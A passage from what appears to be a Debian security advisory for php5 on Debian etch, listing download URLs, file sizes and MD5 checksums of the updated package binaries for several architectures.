2487508 7cf62cb8552389fc0fbb8197b7de3808 http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0+dfsg-8+etch15_alpha.deb Size/MD5 checksum: 18612 a9322e7cbf565373df7bb13ede5b140e http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0+dfsg-8+etch15_alpha.deb Size/MD5 checksum: 2412536 a61c4e23f2b41757d8cd98f2c25e8f3a http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0+dfsg-8+etch15_alpha.deb Size/MD5 checksum: 40296 a7dc0d924077f01cc7341d5ab5592151 http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0+dfsg-8+etch15_alpha.deb Size/MD5 checksum: 36648 4c4fac1064c51938b08d8ce444317503 http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0+dfsg-8+etch15_alpha.deb Size/MD5 checksum: 13386 7df621f308e5be601693a14ad147cfc2 http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0+dfsg-8+etch15_alpha.deb Size/MD5 checksum: 19602 05da76fefb3435a6dc6d1a1d3cc05da9 http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0+dfsg-8+etch15_alpha.deb Size/MD5 checksum: 24966 968d6f231c862b7261f2f7e29bb1f297 http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0+dfsg-8+etch15_alpha.deb Size/MD5 checksum: 4952 a77709bc4600faeec75f63597c6333aa http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0+dfsg-8+etch15_alpha.deb Size/MD5 checksum: 11844 229ca7db558bdc823c1802dc5399f422 http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0+dfsg-8+etch15_alpha.deb Size/MD5 checksum: 17548 1fcb3438c69905237c89957d5491a6b5 http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0+dfsg-8+etch15_alpha.deb Size/MD5 checksum: 36114 5582c32c8c44bdebfe6e4fae73e0a3f6 http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0+dfsg-8+etch15_alpha.deb Size/MD5 checksum: 9054 8e1e0de6fe55bda2f749197f1c4177ad http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0+dfsg-8+etch15_alpha.deb Size/MD5 checksum: 13474 976cc49b0a93a751ee785a93aa3ee5d1 http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0+dfsg-8+etch15_alpha.deb Size/MD5 checksum: 36510 3403d24592323e28561d05eb0299110f http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0+dfsg-8+etch15_alpha.deb Size/MD5 checksum: 345330 8a5701ec09bbb5b03ac2f543f4320452 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0+dfsg-8+etch15_amd64.deb Size/MD5 checksum: 38588 90097351de2bac5c6e11a4f7fb5ec73d http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0+dfsg-8+etch15_amd64.deb Size/MD5 checksum: 19438 f80699a3c7592b7c38f50af56eeeb957 http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0+dfsg-8+etch15_amd64.deb Size/MD5 checksum: 345976 51b9e65a337166cdb1125549580abf89 http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0+dfsg-8+etch15_amd64.deb Size/MD5 checksum: 2379548 0b47996fb2a5944fd22ab8b65cf4c722 http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0+dfsg-8+etch15_amd64.deb Size/MD5 checksum: 36416 3ace3d84f12b5a8e83248e738fcb706e http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0+dfsg-8+etch15_amd64.deb Size/MD5 checksum: 24994 5fbbeb2537f4876d7a516464d510173a http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0+dfsg-8+etch15_amd64.deb Size/MD5 checksum: 9404 1fdbf3acbf72ef317428fe4f60485882 http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0+dfsg-8+etch15_amd64.deb Size/MD5 checksum: 5266 39eff740288549e5d8ea1cdce0c5f85b http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0+dfsg-8+etch15_amd64.deb Size/MD5 checksum: 53952 94aae1cea47eb7b61be1800e011a93b9 http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0+dfsg-8+etch15_amd64.deb Size/MD5 checksum: 36726 5c0f91b30760d8512384c0f68dc2bf21 http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0+dfsg-8+etch15_amd64.deb Size/MD5 checksum: 4904 4bb26c59f0c29152d7d62dd048b25bb2 http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0+dfsg-8+etch15_amd64.deb Size/MD5 checksum: 39166 9f9aea8b4be57aad3d2eda043e190c03 http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0+dfsg-8+etch15_amd64.deb Size/MD5 checksum: 12062 c4e5fd6ba704945b175c410a4b728672 http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0+dfsg-8+etch15_amd64.deb Size/MD5 checksum: 71674 c547292c0a0d6da49953e1001db139d8 http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0+dfsg-8+etch15_amd64.deb Size/MD5 checksum: 37124 99d582300b639a7db1b781ce76a28738 http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0+dfsg-8+etch15_amd64.deb Size/MD5 checksum: 13030 7776dbf0c8a27a45fb358f2bb6c2f7f9 http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0+dfsg-8+etch15_amd64.deb Size/MD5 checksum: 2434624 913d144ced4d3cbcbfd55361f60fe791 http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0+dfsg-8+etch15_amd64.deb Size/MD5 checksum: 17570 1d72cf93b65af6c999e443e656531123 http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0+dfsg-8+etch15_amd64.deb Size/MD5 checksum: 18670 c24afd04176a516986910ab36e612f3c http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0+dfsg-8+etch15_amd64.deb Size/MD5 checksum: 13494 4a7e7dd3e7e2b86097b9494bfa4dcec9 http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0+dfsg-8+etch15_amd64.deb Size/MD5 checksum: 4718800 7d29d3f231affd34e79719346d075327 http://security.debian.org/pool/updates/main/p/php5/php5-interbase_5.2.0+dfsg-8+etch15_amd64.deb Size/MD5 checksum: 46630 ce7e64f8aa10fbc1f40149fcbd40f6e0 http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0+dfsg-8+etch15_amd64.deb Size/MD5 checksum: 218482 294541ab5286e92e2895931547a4015e http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0+dfsg-8+etch15_amd64.deb Size/MD5 checksum: 2433932 aad636fd27d8f7d7575d5ff3b89dce3f arm architecture (ARM) http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0+dfsg-8+etch15_arm.deb Size/MD5 checksum: 24088 139529fe838c8cd016eff13e025436a1 http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0+dfsg-8+etch15_arm.deb Size/MD5 checksum: 2311092 61d8a0de6eb125ad57fdad955fb35876 http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0+dfsg-8+etch15_arm.deb Size/MD5 checksum: 17090 47014280f104d578718f7582bcf055d4 http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0+dfsg-8+etch15_arm.deb Size/MD5 checksum: 10934 76b74a1ccc9eea4c8756859e9479eb47 http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0+dfsg-8+etch15_arm.deb Size/MD5 checksum: 4575698 56703045b95644440f032a798c879607 http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0+dfsg-8+etch15_arm.deb Size/MD5 checksum: 33654 0663eee52f40ac47d681447b9d488fe5 http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0+dfsg-8+etch15_arm.deb Size/MD5 checksum: 2304346 c5cff8448c9b6c98825435d27b3dbcea http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0+dfsg-8+etch15_arm.deb Size/MD5 checksum: 63830 055eea0ef9ba6d30329a1f9326dbfe6f http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0+dfsg-8+etch15_arm.deb Size/MD5 checksum: 4646 a4ed1f4addda690552985021b9b0501d http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0+dfsg-8+etch15_arm.deb Size/MD5 checksum: 17942 300b0e8b66a21790c6ed79021e8d6572 http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0+dfsg-8+etch15_arm.deb Size/MD5 checksum: 33746 1f14e9713631c01d081cd94039a38cd4 http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0+dfsg-8+etch15_arm.deb Size/MD5 checksum: 4870 32f28ba8771fa1fdb005482d8b7eca65 http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0+dfsg-8+etch15_arm.deb Size/MD5 checksum: 33686 ecb6721d6082a5584b292a0d39f5f9cf http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0+dfsg-8+etch15_arm.deb Size/MD5 checksum: 15840 8061206023b9effb8f0806d0113455bf http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0+dfsg-8+etch15_arm.deb Size/MD5 checksum: 33662 c8049500843ff9cbcc0157a65f4bf3a4 http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0+dfsg-8+etch15_arm.deb Size/MD5 checksum: 8760 d21592b925ae39243ef58a26cb293d92 http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0+dfsg-8+etch15_arm.deb Size/MD5 checksum: 216574 182a35a7328d9379e2cf6ef2e5451c99 http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0+dfsg-8+etch15_arm.deb Size/MD5 checksum: 2310394 fc702e479a5a57b70b33d70edd71e980 http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0+dfsg-8+etch15_arm.deb Size/MD5 checksum: 49276 69e707fc653c7d8d3fded5839f30734c http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0+dfsg-8+etch15_arm.deb Size/MD5 checksum: 344728 f0344af40e52b2b0a02da44c6a23a3b7 http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0+dfsg-8+etch15_arm.deb Size/MD5 checksum: 33026 b2da33b4b6be1a07758ba7b48634e46f http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0+dfsg-8+etch15_arm.deb Size/MD5 checksum: 12452 fb64792d2924c2b5288b78941769ff78 http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0+dfsg-8+etch15_arm.deb Size/MD5 checksum: 11872 3310a036b1c05e62407b605d41be42e4 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0+dfsg-8+etch15_hppa.deb Size/MD5 checksum: 2636602 1d4280efa2bea1c4ff0eb2214a2dd36e http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0+dfsg-8+etch15_hppa.deb Size/MD5 checksum: 75410 4489680360a0027fdb180613e0758078 http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0+dfsg-8+etch15_hppa.deb Size/MD5 checksum: 20318 6acbf7623ccbeec417d6c2cd3ca1a50a http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0+dfsg-8+etch15_hppa.deb Size/MD5 checksum: 58134 1f3af80512a5d21c2f5299ab8a4d0948 http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0+dfsg-8+etch15_hppa.deb Size/MD5 checksum: 9744 505d36dd1dcdc1ed0c92d9457608e1eb http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0+dfsg-8+etch15_hppa.deb Size/MD5 checksum: 5035620 764abcfbbd604c819204adfa710a91a1 http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0+dfsg-8+etch15_hppa.deb Size/MD5 checksum: 12560 cf0b5fdb8cc13b3d35512ed3dffe9b04 http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0+dfsg-8+etch15_hppa.deb Size/MD5 checksum: 224002 3df6d6779e738add334fecda3a669d50 http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0+dfsg-8+etch15_hppa.deb Size/MD5 checksum: 2537952 0eea042d04ef0d9d5daca907fb115f36 http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0+dfsg-8+etch15_hppa.deb Size/MD5 checksum: 2636478 522401c79c6564057fe9d5eedf7cc135 http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0+dfsg-8+etch15_hppa.deb Size/MD5 checksum: 42130 6edae2743fd4d85230e9df3a74d8811f http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0+dfsg-8+etch15_hppa.deb Size/MD5 checksum: 39992 fe7ed8416cf8dcf95f674f06375fab4f http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0+dfsg-8+etch15_hppa.deb Size/MD5 checksum: 38268 1e812f8225b53862d728d440c6a7947c http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0+dfsg-8+etch15_hppa.deb Size/MD5 checksum: 5500 bcb747a022f9c6f59fad63574f1f7bc9 http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0+dfsg-8+etch15_hppa.deb Size/MD5 checksum: 346676 3f09913be9599bfc49fe8487d7e32560 http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0+dfsg-8+etch15_hppa.deb Size/MD5 checksum: 28248 67db4600ec126a7b87fa7a2f6f600109 http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0+dfsg-8+etch15_hppa.deb Size/MD5 checksum: 21124 9a0dee178d99a85699a7666d81ae1bc6 http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0+dfsg-8+etch15_hppa.deb Size/MD5 checksum: 5820 cd5b6df44213c036235b71bc436753eb http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0+dfsg-8+etch15_hppa.deb Size/MD5 checksum: 15546 18ef0779da3a390439b41c7148e1c1c0 http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0+dfsg-8+etch15_hppa.deb Size/MD5 checksum: 14102 f39ff27986b250ce0308d358956e9d09 http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0+dfsg-8+etch15_hppa.deb Size/MD5 checksum: 39548 28ddbae4b7c8b4b385d5bbee109759d6 http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0+dfsg-8+etch15_hppa.deb Size/MD5 checksum: 40968 1ad6327a6d6da549ee8fbd3640abbfc7 http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0+dfsg-8+etch15_hppa.deb Size/MD5 checksum: 19592 e0f5341cdffb177d8fad92367f884b05 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0+dfsg-8+etch15_i386.deb Size/MD5 checksum: 2339206 24952846b1f59700d9fc3eb7eda593b8 http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0+dfsg-8+etch15_i386.deb Size/MD5 checksum: 34086 1283e885c115d0961e0b9bd1dfb50335 http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0+dfsg-8+etch15_i386.deb Size/MD5 checksum: 18384 6fe9fe930101234fd8ed633282836d97 http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0+dfsg-8+etch15_i386.deb Size/MD5 checksum: 12818 ae6b2666d55ee3d71e937bad4cdf0509 http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0+dfsg-8+etch15_i386.deb Size/MD5 checksum: 4766 857beffe74346879511be8bcaa3d937d http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0+dfsg-8+etch15_i386.deb Size/MD5 checksum: 34460 6c8956b10463043b95f6d61f47a1c0ed http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0+dfsg-8+etch15_i386.deb Size/MD5 checksum: 8622 bb7757c392c46dd57205db363c48956e http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0+dfsg-8+etch15_i386.deb Size/MD5 checksum: 11298 457bc1fa3b3cd4b18634fc31f430da10 http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0+dfsg-8+etch15_i386.deb Size/MD5 checksum: 4612770 5297c410089bd79e5273f54e61a95c7c http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0+dfsg-8+etch15_i386.deb Size/MD5 checksum: 2339536 ce82b2daf6088d3bf06c244270ef1ad3 http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0+dfsg-8+etch15_i386.deb Size/MD5 checksum: 36452 e23cdeea5fb3e7df0dd0cc5613d35f5b http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0+dfsg-8+etch15_i386.deb Size/MD5 checksum: 33528 e73d034a8f817960ebee7bfed883cfd3 http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0+dfsg-8+etch15_i386.deb Size/MD5 checksum: 12252 aaa909c8c6f9fc4574dafae706f6dbfb http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0+dfsg-8+etch15_i386.deb Size/MD5 checksum: 215532 8eaaf77fb9f14f518c4205032fe27fb3 http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0+dfsg-8+etch15_i386.deb Size/MD5 checksum: 5044 7df43dcab59897a4d7608e5df8fd8142 http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0+dfsg-8+etch15_i386.deb Size/MD5 checksum: 50698 17441dce657d1e87468a9cf33e680c28 http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0+dfsg-8+etch15_i386.deb Size/MD5 checksum: 24466 9bcd0e50b57bb267cc935b9d6f23b72b http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0+dfsg-8+etch15_i386.deb Size/MD5 checksum: 16464 c3527acc4fc312a727d8fcc126275532 http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0+dfsg-8+etch15_i386.deb Size/MD5 checksum: 64864 7621b979e84c5c6eb05d7c59df78edb9 http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0+dfsg-8+etch15_i386.deb Size/MD5 checksum: 2324852 c890a001de3c22548d64a2d139972af3 http://security.debian.org/pool/updates/main/p/php5/php5-interbase_5.2.0+dfsg-8+etch15_i386.deb Size/MD5 checksum: 44384 88eede96bb9b95cf92b185375a0d7df3 http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0+dfsg-8+etch15_i386.deb Size/MD5 checksum: 17230 2110c3fa04b3472e007f7912b63dc99a http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0+dfsg-8+etch15_i386.deb Size/MD5 checksum: 346094 539d27179093a56eea2a778503e4ab89 http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0+dfsg-8+etch15_i386.deb Size/MD5 checksum: 34542 a71392dfe59e096dfe1b66c7b7609cb8 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0+dfsg-8+etch15_ia64.deb Size/MD5 checksum: 342160 e6eff7c4291c8ea3dcac884e7f8806ed http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0+dfsg-8+etch15_ia64.deb Size/MD5 checksum: 34404 80e5043247dd32ea06ea79a512ae1110 http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0+dfsg-8+etch15_ia64.deb Size/MD5 checksum: 17764 4471890b779b393eee26cff018dc3ac4 http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0+dfsg-8+etch15_ia64.deb Size/MD5 checksum: 76614 1215248075f451832c6394937a1f679c http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0+dfsg-8+etch15_ia64.deb Size/MD5 checksum: 54516 6e54cd43ef8e8fc02b7333d9b6f7b164 http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0+dfsg-8+etch15_ia64.deb Size/MD5 checksum: 25084 12f75ac1de0efa710deddcc09d4af92e http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0+dfsg-8+etch15_ia64.deb Size/MD5 checksum: 6140 c8144d6ecc95119158876e657392829b http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0+dfsg-8+etch15_ia64.deb Size/MD5 checksum: 54672 81cb800a37f35635e6de6b3c51fef2f9 http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0+dfsg-8+etch15_ia64.deb Size/MD5 checksum: 6494 e309a1a419f33a87320819934045e163 http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0+dfsg-8+etch15_ia64.deb Size/MD5 checksum: 50646 3c9f5bd7da07053000937eccacbf263e http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0+dfsg-8+etch15_ia64.deb Size/MD5 checksum: 3197862 b5b20854ae8d05ea4f17e9a5b62a2b15 http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0+dfsg-8+etch15_ia64.deb Size/MD5 checksum: 235830 052a058da72b25c4c466b477c5e23f43 http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0+dfsg-8+etch15_ia64.deb Size/MD5 checksum: 50238 98e0f5f276a683a24a8b675a1f0c8b39 http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0+dfsg-8+etch15_ia64.deb Size/MD5 checksum: 17550 861a357ce4f6f84f13357b0d4a83ec89 http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0+dfsg-8+etch15_ia64.deb Size/MD5 checksum: 12008 1ca7c135bac7e8f150440faa608594ee http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0+dfsg-8+etch15_ia64.deb Size/MD5 checksum: 3151408 a3f8099d8fd1eaa468f29f6b5cf64638 http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0+dfsg-8+etch15_ia64.deb Size/MD5 checksum: 6259170 87aa402d5bbd1d569a1f2505f99c17e1 http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0+dfsg-8+etch15_ia64.deb Size/MD5 checksum: 95628 2ee174b8ad8a57f9c22bc82834c586c0 http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0+dfsg-8+etch15_ia64.deb Size/MD5 checksum: 3199180 f5ab4ba24bfee5893a9678c383dec1e8 http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0+dfsg-8+etch15_ia64.deb Size/MD5 checksum: 24860 981b166670ec4db54249364253bfdaf2 http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0+dfsg-8+etch15_ia64.deb Size/MD5 checksum: 48398 b0e340d43ba129404179531374e1f6cd http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0+dfsg-8+etch15_ia64.deb Size/MD5 checksum: 27146 4023c1b6cd5892e1ad34b393deb307eb http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0+dfsg-8+etch15_ia64.deb Size/MD5 checksum: 15432 cf872de4cb705f70390974abc98d4708 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0+dfsg-8+etch15_mips.deb Size/MD5 checksum: 31606 8dad9676d8dcc418e7e3c3ce9981897c http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0+dfsg-8+etch15_mips.deb Size/MD5 checksum: 8278 42017d4bacb172c87e357963736bdd0f http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0+dfsg-8+etch15_mips.deb Size/MD5 checksum: 49504 2c52f40ddd8288ec3c02c706ec33bff9 http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0+dfsg-8+etch15_mips.deb Size/MD5 checksum: 63870 36fd776109f1d0f2638dc3d7d56c312c http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0+dfsg-8+etch15_mips.deb Size/MD5 checksum: 2414420 f9ea9a79dea86f4130a82f9ce89ab360 http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0+dfsg-8+etch15_mips.deb Size/MD5 checksum: 4736432 82bf779a2153573b1719241855c6b0a7 http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0+dfsg-8+etch15_mips.deb Size/MD5 checksum: 15736 947c8434695bc5e644c28c8424011b49 http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0+dfsg-8+etch15_mips.deb Size/MD5 checksum: 12472 bb7c7775c6a9894d89adab19f2653eed http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0+dfsg-8+etch15_mips.deb Size/MD5 checksum: 32766 12de93032df13f057bb167c1c830c07f http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0+dfsg-8+etch15_mips.deb Size/MD5 checksum: 35260 e8db5f85f2e8072e0c711f21fbb7c9f1 http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0+dfsg-8+etch15_mips.deb Size/MD5 checksum: 2388138 ec4c08d36c9080e566120c7ed6c0dd65 http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0+dfsg-8+etch15_mips.deb Size/MD5 checksum: 18504 fdf8cd94cacff491ed1fed5000c94ea7 http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0+dfsg-8+etch15_mips.deb Size/MD5 checksum: 33180 57028bd8f7813d69bd3d8d06126a3fe9 http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0+dfsg-8+etch15_mips.deb Size/MD5 checksum: 5244 30460c36a670637a4df98d79dcf587fb http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0+dfsg-8+etch15_mips.deb Size/MD5 checksum: 35604 6561405e37bd4442c2ddc62d9f05f332 http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0+dfsg-8+etch15_mips.deb Size/MD5 checksum: 217186 0a4655619e3eb5e2ee4886b223b8e5aa http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0+dfsg-8+etch15_mips.deb Size/MD5 checksum: 12212 9e75c2d0bad91ddd121d5c46e755360d http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0+dfsg-8+etch15_mips.deb Size/MD5 checksum: 11348 e0e683bff422f973eda014c50d2bca60 http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0+dfsg-8+etch15_mips.deb Size/MD5 checksum: 4908 88190b0ff2787e8a8c015bcbd7181a57 http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0+dfsg-8+etch15_mips.deb Size/MD5 checksum: 17312 f4c9ef90446fe25e8cd9d7a11ed10138 http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0+dfsg-8+etch15_mips.deb Size/MD5 checksum: 23356 fcd7a26f66c7065702c0c00ed70f119c http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0+dfsg-8+etch15_mips.deb Size/MD5 checksum: 345462 5199aeefe250ec141efa47afcd18e2cf http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0+dfsg-8+etch15_mips.deb Size/MD5 checksum: 2414070 a9e0301735bc3bb48f23383967eb05d4 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0+dfsg-8+etch15_mipsel.deb Size/MD5 checksum: 12138 42546e557bb86db0a5f3e541976afd52 http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0+dfsg-8+etch15_mipsel.deb Size/MD5 checksum: 4900 21a213cc2cbd83d73c5b27b9f6c878b2 http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0+dfsg-8+etch15_mipsel.deb Size/MD5 checksum: 2368910 64a267448b861bd051af1abfbabe7a88 http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0+dfsg-8+etch15_mipsel.deb Size/MD5 checksum: 33094 3f877ac3825211064a49041fbca106ee http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0+dfsg-8+etch15_mipsel.deb Size/MD5 checksum: 8206 0f3a0e6e9b49ee01aff6f6401e74e3cb http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0+dfsg-8+etch15_mipsel.deb Size/MD5 checksum: 63412 88618e0af2633a15253e92ded4b79b73 http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0+dfsg-8+etch15_mipsel.deb Size/MD5 checksum: 34934 79432995d1ffddb14daebf850d510b21 http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0+dfsg-8+etch15_mipsel.deb Size/MD5 checksum: 31554 7fea1636707354bf7407428a27d38795 http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0+dfsg-8+etch15_mipsel.deb Size/MD5 checksum: 5238 dc1ee8be27173097a9f5d7ba16be96da http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0+dfsg-8+etch15_mipsel.deb Size/MD5 checksum: 35562 5a60ff7ada9a820521b03f0871590b9e http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0+dfsg-8+etch15_mipsel.deb Size/MD5 checksum: 2369942 1046b334cd679e807cf56ce7cd0ca0aa http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0+dfsg-8+etch15_mipsel.deb Size/MD5 checksum: 4687640 483f99e6db60c78b26181298352309af 